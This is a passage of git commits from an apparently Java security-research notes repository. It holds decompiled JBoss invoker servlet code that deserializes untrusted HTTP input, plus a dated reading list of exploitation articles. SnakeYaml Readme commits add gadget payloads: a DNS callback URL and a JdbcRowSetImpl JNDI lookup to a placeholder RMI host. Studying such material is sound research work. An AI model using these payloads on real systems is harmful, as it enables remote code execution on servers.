+
+```
+org.jboss.invocation.http.servlet.ReadOnlyAccessFilter
+```java
+//
+// Source code recreated from a .class file by IntelliJ IDEA
+// (powered by FernFlower decompiler)
+//
+
+package org.jboss.invocation.http.servlet;
+
+import java.io.IOException;
+import java.io.ObjectInputStream;
+import java.lang.reflect.Method;
+import java.security.Principal;
+import java.util.Map;
+import javax.management.MBeanServer;
+import javax.management.ObjectName;
+import javax.servlet.Filter;
+import javax.servlet.FilterChain;
+import javax.servlet.FilterConfig;
+import javax.servlet.ServletException;
+import javax.servlet.ServletInputStream;
+import javax.servlet.ServletRequest;
+import javax.servlet.ServletResponse;
+import javax.servlet.http.HttpServletRequest;
+import org.jboss.invocation.MarshalledInvocation;
+import org.jboss.logging.Logger;
+import org.jboss.mx.util.MBeanServerLocator;
+
+public class ReadOnlyAccessFilter implements Filter {
+ private static Logger log = Logger.getLogger(ReadOnlyAccessFilter.class);
+ private FilterConfig filterConfig = null;
+ private String readOnlyContext;
+ private Map namingMethodMap;
+
+ public ReadOnlyAccessFilter() {
+ }
+
+ public void init(FilterConfig filterConfig) throws ServletException {
+ this.filterConfig = filterConfig;
+ if (filterConfig != null) {
+ this.readOnlyContext = filterConfig.getInitParameter("readOnlyContext");
+ String invokerName = filterConfig.getInitParameter("invokerName");
+
+ try {
+ MBeanServer mbeanServer = MBeanServerLocator.locateJBoss();
+ ObjectName mbean = new ObjectName(invokerName);
+ this.namingMethodMap = (Map)mbeanServer.getAttribute(mbean, "MethodMap");
+ } catch (Exception var5) {
+ log.error("Failed to init ReadOnlyAccessFilter", var5);
+ throw new ServletException("Failed to init ReadOnlyAccessFilter", var5);
+ }
+ }
+
+ }
+
+ public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
+ HttpServletRequest httpRequest = (HttpServletRequest)request;
+ Principal user = httpRequest.getUserPrincipal();
+ if (user == null && this.readOnlyContext != null) {
+ ServletInputStream sis = request.getInputStream();
+ ObjectInputStream ois = new ObjectInputStream(sis);
+ MarshalledInvocation mi = null;
+
+ try {
+ mi = (MarshalledInvocation)ois.readObject();
+ } catch (ClassNotFoundException var10) {
+ throw new ServletException("Failed to read MarshalledInvocation", var10);
+ }
+
+ request.setAttribute("MarshalledInvocation", mi);
+ mi.setMethodMap(this.namingMethodMap);
+ Method m = mi.getMethod();
+ if (m != null) {
+ this.validateAccess(m, mi);
+ }
+ }
+
+ chain.doFilter(request, response);
+ }
+
+ public void destroy() {
+ }
+
+ public String toString() {
+ if (this.filterConfig == null) {
+ return "NamingAccessFilter()";
+ } else {
+ StringBuffer sb = new StringBuffer("NamingAccessFilter(");
+ sb.append(this.filterConfig);
+ sb.append(")");
+ return sb.toString();
+ }
+ }
+
+ private void validateAccess(Method m, MarshalledInvocation mi) throws ServletException {
+ boolean trace = log.isTraceEnabled();
+ if (trace) {
+ log.trace("Checking against readOnlyContext: " + this.readOnlyContext);
+ }
+
+ String methodName = m.getName();
+ if (!methodName.equals("lookup")) {
+ throw new ServletException("Only lookups against " + this.readOnlyContext + " are allowed");
+ } else {
+ Object[] args = mi.getArguments();
+ Object arg = args.length > 0 ? args[0] : "";
+ String name;
+ if (arg instanceof String) {
+ name = (String)arg;
+ } else {
+ name = arg.toString();
+ }
+
+ if (trace) {
+ log.trace("Checking lookup(" + name + ") against: " + this.readOnlyContext);
+ }
+
+ if (!name.startsWith(this.readOnlyContext)) {
+ throw new ServletException("Lookup(" + name + ") is not under: " + this.readOnlyContext);
+ }
+ }
+ }
+}
+```
+org.jboss.invocation.http.servlet.InvokerServlet
+```java
+//
+// Source code recreated from a .class file by IntelliJ IDEA
+// (powered by FernFlower decompiler)
+//
+
+package org.jboss.invocation.http.servlet;
+
+import java.io.IOException;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import java.lang.reflect.InvocationTargetException;
+import java.security.AccessController;
+import java.security.Principal;
+import java.security.PrivilegedAction;
+import javax.management.MBeanServer;
+import javax.management.MalformedObjectNameException;
+import javax.management.ObjectName;
+import javax.servlet.ServletConfig;
+import javax.servlet.ServletException;
+import javax.servlet.ServletInputStream;
+import javax.servlet.ServletOutputStream;
+import javax.servlet.http.HttpServlet;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import org.jboss.invocation.InvocationException;
+import org.jboss.invocation.MarshalledInvocation;
+import org.jboss.invocation.MarshalledValue;
+import org.jboss.logging.Logger;
+import org.jboss.mx.util.JMXExceptionDecoder;
+import org.jboss.mx.util.MBeanServerLocator;
+import org.jboss.security.SecurityAssociation;
+import org.jboss.system.Registry;
+
+public class InvokerServlet extends HttpServlet {
+ private static Logger log = Logger.getLogger(InvokerServlet.class);
+ private static String REQUEST_CONTENT_TYPE = "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation";
+ private static String RESPONSE_CONTENT_TYPE = "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue";
+ private MBeanServer mbeanServer;
+ private ObjectName localInvokerName;
+
+ public InvokerServlet() {
+ }
+
+ public void init(ServletConfig config) throws ServletException {
+ super.init(config);
+
+ try {
+ String name = config.getInitParameter("invokerName");
+ if (name != null) {
+ this.localInvokerName = new ObjectName(name);
+ log.debug("localInvokerName=" + this.localInvokerName);
+ }
+ } catch (MalformedObjectNameException var3) {
+ throw new ServletException("Failed to build invokerName", var3);
+ }
+
+ this.mbeanServer = MBeanServerLocator.locateJBoss();
+ if (this.mbeanServer == null) {
+ throw new ServletException("Failed to locate the MBeanServer");
+ }
+ }
+
+ public void destroy() {
+ }
+
+ protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
+ boolean trace = log.isTraceEnabled();
+ if (trace) {
+ log.trace("processRequest, ContentLength: " + request.getContentLength());
+ log.trace("processRequest, ContentType: " + request.getContentType());
+ }
+
+ Boolean returnValueAsAttribute = (Boolean)request.getAttribute("returnValueAsAttribute");
+
+ try {
+ response.setContentType(RESPONSE_CONTENT_TYPE);
+ MarshalledInvocation mi = (MarshalledInvocation)request.getAttribute("MarshalledInvocation");
+ if (mi == null) {
+ ServletInputStream sis = request.getInputStream();
+ ObjectInputStream ois = new ObjectInputStream(sis);
+ mi = (MarshalledInvocation)ois.readObject();
+ ois.close();
+ }
+
+ if (mi.getPrincipal() == null && mi.getCredential() == null) {
+ mi.setPrincipal(InvokerServlet.GetPrincipalAction.getPrincipal());
+ mi.setCredential(InvokerServlet.GetCredentialAction.getCredential());
+ }
+
+ Object[] params = new Object[]{mi};
+ String[] sig = new String[]{"org.jboss.invocation.Invocation"};
+ ObjectName invokerName = this.localInvokerName;
+ if (invokerName == null) {
+ Integer nameHash = (Integer)mi.getObjectName();
+ invokerName = (ObjectName)Registry.lookup(nameHash);
+ if (invokerName == null) {
+ throw new ServletException("Failed to find invoker name for hash(" + nameHash + ")");
+ }
+ }
+
+ Object value = this.mbeanServer.invoke(invokerName, "invoke", params, sig);
+ if (returnValueAsAttribute != null && returnValueAsAttribute) {
+ request.setAttribute("returnValue", value);
+ } else {
+ MarshalledValue mv = new MarshalledValue(value);
+ ServletOutputStream sos = response.getOutputStream();
+ ObjectOutputStream oos = new ObjectOutputStream(sos);
+ oos.writeObject(mv);
+ oos.close();
+ }
+ } catch (Throwable var13) {
+ Throwable t = JMXExceptionDecoder.decode(var13);
+ if (t instanceof InvocationTargetException) {
+ InvocationTargetException ite = (InvocationTargetException)t;
+ t = ite.getTargetException();
+ }
+
+ InvocationException appException = new InvocationException(t);
+ if (returnValueAsAttribute != null && returnValueAsAttribute) {
+ log.debug("Invoke threw exception", t);
+ request.setAttribute("returnValue", appException);
+ } else if (response.isCommitted()) {
+ log.error("Invoke threw exception, and response is already committed", t);
+ } else {
+ response.resetBuffer();
+ MarshalledValue mv = new MarshalledValue(appException);
+ ServletOutputStream sos = response.getOutputStream();
+ ObjectOutputStream oos = new ObjectOutputStream(sos);
+ oos.writeObject(mv);
+ oos.close();
+ }
+ }
+
+ }
+
+ protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
+ this.processRequest(request, response);
+ }
+
+ protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
+ this.processRequest(request, response);
+ }
+
+ public String getServletInfo() {
+ return "An HTTP to JMX invocation servlet";
+ }
+
+ private static class GetCredentialAction implements PrivilegedAction {
+ static PrivilegedAction ACTION = new InvokerServlet.GetCredentialAction();
+
+ private GetCredentialAction() {
+ }
+
+ public Object run() {
+ Object credential = SecurityAssociation.getCredential();
+ return credential;
+ }
+
+ static Object getCredential() {
+ Object credential = AccessController.doPrivileged(ACTION);
+ return credential;
+ }
+ }
+
+ private static class GetPrincipalAction implements PrivilegedAction {
+ static PrivilegedAction ACTION = new InvokerServlet.GetPrincipalAction();
+
+ private GetPrincipalAction() {
+ }
+
+ public Object run() {
+ Principal principal = SecurityAssociation.getPrincipal();
+ return principal;
+ }
+
+ static Principal getPrincipal() {
+ Principal principal = (Principal)AccessController.doPrivileged(ACTION);
+ return principal;
+ }
+ }
+}
+```
From dd1fe2e2aba2fdfc7696cab2bea729323bdca28d Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sun, 10 Jul 2022 13:49:49 +0800
Subject: [PATCH 022/257] Update Readme.md
---
.../Velocity/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md"
index 3a3feb9..678fd9a 100644
--- "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md"
+++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md"
@@ -1,4 +1,5 @@
# 真实例子
Confluence CVE-2019-3396
+Jira CVE-2019-11581
From 284f248d9b86e59849cc61c4da798896b4f94d8d Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sun, 10 Jul 2022 14:03:42 +0800
Subject: [PATCH 023/257] Update Readme.md
---
.../Velocity/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md"
index 678fd9a..f6c05c2 100644
--- "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md"
+++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md"
@@ -1,5 +1,6 @@
# 真实例子
Confluence CVE-2019-3396
+
Jira CVE-2019-11581
From e9ada9eb1e24bd231112b09ac1b07002d373c587 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Fri, 15 Jul 2022 12:52:41 +0800
Subject: [PATCH 024/257] Update Readme.md
---
SnakeYaml/Readme.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/SnakeYaml/Readme.md b/SnakeYaml/Readme.md
index cf6bec6..e699ddd 100644
--- a/SnakeYaml/Readme.md
+++ b/SnakeYaml/Readme.md
@@ -8,6 +8,8 @@
https://xz.aliyun.com/t/10655
+限制了class,不过存在class bean中有object属性 https://mp.weixin.qq.com/s/7HJXfNibY9Z3DPGarTqyZQ
+
加载本地
```java
String data2 = "!!javax.script.ScriptEngineManager [\n" +
From 167818cf08b5cf2b3a5e63a6d0019d18fa99e5e1 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Fri, 15 Jul 2022 13:17:26 +0800
Subject: [PATCH 025/257] Update Readme.md
---
SnakeYaml/Readme.md | 6 ++++++
1 file changed, 6 insertions(+)
diff --git a/SnakeYaml/Readme.md b/SnakeYaml/Readme.md
index e699ddd..89be881 100644
--- a/SnakeYaml/Readme.md
+++ b/SnakeYaml/Readme.md
@@ -23,3 +23,9 @@ String data2 = "!!javax.script.ScriptEngineManager [\n" +
```java
String poc = "[!!判断的类全类名 []: 0, !!java.net.URL [null, \"http://ixvoxg.dnslog.cn\"]: 1]";
```
+
+## 其他链 一般是jndi
+
+```
+!!com.sun.rowset.JdbcRowSetImpl {dataSourceName: "rmi://xxxx", autoCommit: true}
+```
From 6f60ab9cd377302f64b3b0edc8108b4437ece805 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Fri, 15 Jul 2022 13:20:48 +0800
Subject: [PATCH 026/257] Update Readme.md
---
SnakeYaml/Readme.md | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/SnakeYaml/Readme.md b/SnakeYaml/Readme.md
index 89be881..b14e92b 100644
--- a/SnakeYaml/Readme.md
+++ b/SnakeYaml/Readme.md
@@ -3,12 +3,12 @@
## 不出网利用
>通过写文件然后本地加载rce
-//todo 写一个工具 去完成
+//todo 写一个工具 去完成 已经完成了
https://xz.aliyun.com/t/10655
-限制了class,不过存在class bean中有object属性 https://mp.weixin.qq.com/s/7HJXfNibY9Z3DPGarTqyZQ
+限制了class,不过存在class bean中有object属性 参考: https://mp.weixin.qq.com/s/7HJXfNibY9Z3DPGarTqyZQ
加载本地
```java
@@ -29,3 +29,5 @@ String data2 = "!!javax.script.ScriptEngineManager [\n" +
```
!!com.sun.rowset.JdbcRowSetImpl {dataSourceName: "rmi://xxxx", autoCommit: true}
```
+
+参考: https://www.mi1k7ea.com/2019/11/29/Java-SnakeYaml%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E
From ef6fb63bae480bb06898555d39d777b1cc2ce472 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Fri, 15 Jul 2022 14:19:49 +0800
Subject: [PATCH 027/257] Update Readme.md
---
shell/EL/Readme.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/shell/EL/Readme.md b/shell/EL/Readme.md
index 24f8a89..56f6390 100644
--- a/shell/EL/Readme.md
+++ b/shell/EL/Readme.md
@@ -1,5 +1,7 @@
# EL
+https://xz.aliyun.com/t/7692
+
## 回显
https://forum.butian.net/share/886
From 8dead4aea8192692eadb399e15f38b3695a8acbe Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Mon, 18 Jul 2022 21:53:16 +0800
Subject: [PATCH 028/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 415bb41..54e1208 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -146,3 +146,4 @@
+ 2022/06/27 [漏洞检测的那些事儿](https://paper.seebug.org/9/) **漏洞检测相关的知识**
+ 2022/07/02 [记一次无文件Webshell攻击分析](https://changxia3.com/2021/07/13/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%97%A0%E6%96%87%E4%BB%B6Webshell%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90/)
+ 2022/07/03 [第16篇:Weblogic 2019-2729反序列化漏洞绕防护拿权限的实战过程](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484303&idx=1&sn=58cbb4d7f63b9276bb89eeac286d174c&chksm=c25fccf4f52845e241256c2f425003b73b6061b3d1964dcd4a184a2cda1b4d8761098227e6de&mpshare=1&scene=23&srcid=0703XRThsRmunAKy5fSIYQKh&sharer_sharetime=1656786411917&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **其中的获取weblogic路径不错**
++ 2022/07/18 [java~通过ClassLoader动态加载类,实现简单的热部署](https://icode.best/i/88333747185426) [java利用classloader实现热部署](https://blog.csdn.net/chaofanwei2/article/details/51298818)
From fd140a0a0a4cd4c9f4807283ae56ef151b4b9cc4 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Mon, 15 Aug 2022 23:31:07 +0800
Subject: [PATCH 029/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 54e1208..8945633 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -147,3 +147,4 @@
+ 2022/07/02 [记一次无文件Webshell攻击分析](https://changxia3.com/2021/07/13/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%97%A0%E6%96%87%E4%BB%B6Webshell%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90/)
+ 2022/07/03 [第16篇:Weblogic 2019-2729反序列化漏洞绕防护拿权限的实战过程](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484303&idx=1&sn=58cbb4d7f63b9276bb89eeac286d174c&chksm=c25fccf4f52845e241256c2f425003b73b6061b3d1964dcd4a184a2cda1b4d8761098227e6de&mpshare=1&scene=23&srcid=0703XRThsRmunAKy5fSIYQKh&sharer_sharetime=1656786411917&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **其中的获取weblogic路径不错**
+ 2022/07/18 [java~通过ClassLoader动态加载类,实现简单的热部署](https://icode.best/i/88333747185426) [java利用classloader实现热部署](https://blog.csdn.net/chaofanwei2/article/details/51298818)
++ 2022/08/15 [玄武盾的几种绕过姿势](https://mp.weixin.qq.com/s/blPSDeuzQxwbjfdvZFlWQg) **里面的编码有点意思**
From faa7c2e1ecca0d6c88ffc8ae5e3fb05b847274ef Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Tue, 16 Aug 2022 13:05:33 +0800
Subject: [PATCH 030/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 8945633..3684b0a 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -148,3 +148,4 @@
+ 2022/07/03 [第16篇:Weblogic 2019-2729反序列化漏洞绕防护拿权限的实战过程](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484303&idx=1&sn=58cbb4d7f63b9276bb89eeac286d174c&chksm=c25fccf4f52845e241256c2f425003b73b6061b3d1964dcd4a184a2cda1b4d8761098227e6de&mpshare=1&scene=23&srcid=0703XRThsRmunAKy5fSIYQKh&sharer_sharetime=1656786411917&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **其中的获取weblogic路径不错**
+ 2022/07/18 [java~通过ClassLoader动态加载类,实现简单的热部署](https://icode.best/i/88333747185426) [java利用classloader实现热部署](https://blog.csdn.net/chaofanwei2/article/details/51298818)
+ 2022/08/15 [玄武盾的几种绕过姿势](https://mp.weixin.qq.com/s/blPSDeuzQxwbjfdvZFlWQg) **里面的编码有点意思**
++ 2022/08/16 [weblogic“伪随机”目录生成算法探究](https://gv7.me/articles/2019/weblogic-pseudo-random-dir-generation-algorithm-exploration/) **比较细节**
From 1167c93eaf24f3a624f3de3351f974627ec9a080 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 20 Aug 2022 00:16:26 +0800
Subject: [PATCH 031/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 3684b0a..675c06c 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -149,3 +149,4 @@
+ 2022/07/18 [java~通过ClassLoader动态加载类,实现简单的热部署](https://icode.best/i/88333747185426) [java利用classloader实现热部署](https://blog.csdn.net/chaofanwei2/article/details/51298818)
+ 2022/08/15 [玄武盾的几种绕过姿势](https://mp.weixin.qq.com/s/blPSDeuzQxwbjfdvZFlWQg) **里面的编码有点意思**
+ 2022/08/16 [weblogic“伪随机”目录生成算法探究](https://gv7.me/articles/2019/weblogic-pseudo-random-dir-generation-algorithm-exploration/) **比较细节**
++ 2022/08/20 [Java安全攻防之从wsProxy到AbstractTranslet](https://mp.weixin.qq.com/s/HuQV6PNBCW4qSKQVQg8ifA) **学习了反序列化代码执行不需要继承AbstractTranslet**
From 0d0387308e0654181dad0fc745a47270c051b96e Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Mon, 22 Aug 2022 15:01:15 +0800
Subject: [PATCH 032/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 675c06c..43d561b 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -150,3 +150,4 @@
+ 2022/08/15 [玄武盾的几种绕过姿势](https://mp.weixin.qq.com/s/blPSDeuzQxwbjfdvZFlWQg) **里面的编码有点意思**
+ 2022/08/16 [weblogic“伪随机”目录生成算法探究](https://gv7.me/articles/2019/weblogic-pseudo-random-dir-generation-algorithm-exploration/) **比较细节**
+ 2022/08/20 [Java安全攻防之从wsProxy到AbstractTranslet](https://mp.weixin.qq.com/s/HuQV6PNBCW4qSKQVQg8ifA) **学习了反序列化代码执行不需要继承AbstractTranslet**
++ 2022/08/22 [ysoserial分析之Jython1利用链](https://mp.weixin.qq.com/s/QNrwrv5leC0FN3H4RL6oEg) **等待完善命令执行。。。**
From e60dddad0ab644b13234f3ecb11bf41d840dcee8 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Thu, 1 Sep 2022 16:54:36 +0800
Subject: [PATCH 033/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 43d561b..17bc0da 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -151,3 +151,4 @@
+ 2022/08/16 [weblogic“伪随机”目录生成算法探究](https://gv7.me/articles/2019/weblogic-pseudo-random-dir-generation-algorithm-exploration/) **比较细节**
+ 2022/08/20 [Java安全攻防之从wsProxy到AbstractTranslet](https://mp.weixin.qq.com/s/HuQV6PNBCW4qSKQVQg8ifA) **学习了反序列化代码执行不需要继承AbstractTranslet**
+ 2022/08/22 [ysoserial分析之Jython1利用链](https://mp.weixin.qq.com/s/QNrwrv5leC0FN3H4RL6oEg) **等待完善命令执行。。。**
++ 2022/09/01 [手把手带你挖掘spring-cloud-gateway新链](https://forum.butian.net/share/1410) **学到了Idea 快捷键Ctrl + Alt + H来查看调用的层次 比较清楚**
From d81bc7d9f602bc8a0dae54484812397d93521ea0 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Fri, 2 Sep 2022 17:25:55 +0800
Subject: [PATCH 034/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 17bc0da..a2df6be 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -152,3 +152,4 @@
+ 2022/08/20 [Java安全攻防之从wsProxy到AbstractTranslet](https://mp.weixin.qq.com/s/HuQV6PNBCW4qSKQVQg8ifA) **学习了反序列化代码执行不需要继承AbstractTranslet**
+ 2022/08/22 [ysoserial分析之Jython1利用链](https://mp.weixin.qq.com/s/QNrwrv5leC0FN3H4RL6oEg) **等待完善命令执行。。。**
+ 2022/09/01 [手把手带你挖掘spring-cloud-gateway新链](https://forum.butian.net/share/1410) **学到了Idea 快捷键Ctrl + Alt + H来查看调用的层次 比较清楚**
++ 2022/09/02 [代码审计之洞态IAST 0day挖掘](https://mp.weixin.qq.com/s/LDBwhQYiiZ8heOiJl83JFQ) **感觉一般**
From 3ad5b0c446a9c11ad2b43d161f07958db950d625 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 10 Sep 2022 00:07:27 +0800
Subject: [PATCH 035/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index a2df6be..a1a5905 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -153,3 +153,4 @@
+ 2022/08/22 [ysoserial分析之Jython1利用链](https://mp.weixin.qq.com/s/QNrwrv5leC0FN3H4RL6oEg) **等待完善命令执行。。。**
+ 2022/09/01 [手把手带你挖掘spring-cloud-gateway新链](https://forum.butian.net/share/1410) **学到了Idea 快捷键Ctrl + Alt + H来查看调用的层次 比较清楚**
+ 2022/09/02 [代码审计之洞态IAST 0day挖掘](https://mp.weixin.qq.com/s/LDBwhQYiiZ8heOiJl83JFQ) **感觉一般**
++ 2022/09/10 [Groovy Template Engine Exploitation – Notes from a real case scenario](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/) **Groovy Template Engine Exploitation 说不定以后遇到**
From a2e3591d7a3c6462fb2bec06c45ab15d71eefaa4 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 10 Sep 2022 23:37:20 +0800
Subject: [PATCH 036/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index a1a5905..74e5f5e 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -154,3 +154,4 @@
+ 2022/09/01 [手把手带你挖掘spring-cloud-gateway新链](https://forum.butian.net/share/1410) **学到了Idea 快捷键Ctrl + Alt + H来查看调用的层次 比较清楚**
+ 2022/09/02 [代码审计之洞态IAST 0day挖掘](https://mp.weixin.qq.com/s/LDBwhQYiiZ8heOiJl83JFQ) **感觉一般**
+ 2022/09/10 [Groovy Template Engine Exploitation – Notes from a real case scenario](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/) **Groovy Template Engine Exploitation 说不定以后遇到**
++ 2022/09/10 [Xalan-J XSLT整数截断漏洞利用构造(CVE-2022-34169)](http://noahblog.360.cn/xalan-j-integer-truncation-reproduce-cve-2022-34169/) **好牛皮 但是看不懂**
From 4d2bd5b6a7f5249428a5e40916489669e9a34c36 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sun, 11 Sep 2022 10:56:24 +0800
Subject: [PATCH 037/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 74e5f5e..28e3f61 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -155,3 +155,4 @@
+ 2022/09/02 [代码审计之洞态IAST 0day挖掘](https://mp.weixin.qq.com/s/LDBwhQYiiZ8heOiJl83JFQ) **感觉一般**
+ 2022/09/10 [Groovy Template Engine Exploitation – Notes from a real case scenario](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/) **Groovy Template Engine Exploitation 说不定以后遇到**
+ 2022/09/10 [Xalan-J XSLT整数截断漏洞利用构造(CVE-2022-34169)](http://noahblog.360.cn/xalan-j-integer-truncation-reproduce-cve-2022-34169/) **好牛皮 但是看不懂**
++ 2022/09/11 [通过动态链接库绕过反病毒软件Hook - Break JVM](https://mp.weixin.qq.com/s?__biz=MzA4NzQwNzY3OQ==&mid=2247483882&idx=1&sn=011c3f231d38d899bcf8bf21010616a0&chksm=9038acbaa74f25acd2983131a4b309424985fde3538cd8a93409336e317a4393350f75c7e334&scene=132#wechat_redirect)
From c7d87f5c8612076aa446c176d4fdb206cfa92882 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Thu, 15 Sep 2022 20:51:20 +0800
Subject: [PATCH 038/257] Create Readme.md
---
Undertow/Readme.md | 5 +++++
1 file changed, 5 insertions(+)
create mode 100644 Undertow/Readme.md
diff --git a/Undertow/Readme.md b/Undertow/Readme.md
new file mode 100644
index 0000000..16d8a83
--- /dev/null
+++ b/Undertow/Readme.md
@@ -0,0 +1,5 @@
+# Undertow
+
+https://blog.csdn.net/hollis_chuang/article/details/104470945
+
+http://blog.hubwiz.com/2016/12/01/webserver-Undertow/
From b63b51024c3f51494e8d85f269904f4ae037e6be Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Fri, 16 Sep 2022 13:35:31 +0800
Subject: [PATCH 039/257] Update Readme.md
---
shell/SPEL/Readme.md | 3 +++
1 file changed, 3 insertions(+)
diff --git a/shell/SPEL/Readme.md b/shell/SPEL/Readme.md
index c83f309..2e57962 100644
--- a/shell/SPEL/Readme.md
+++ b/shell/SPEL/Readme.md
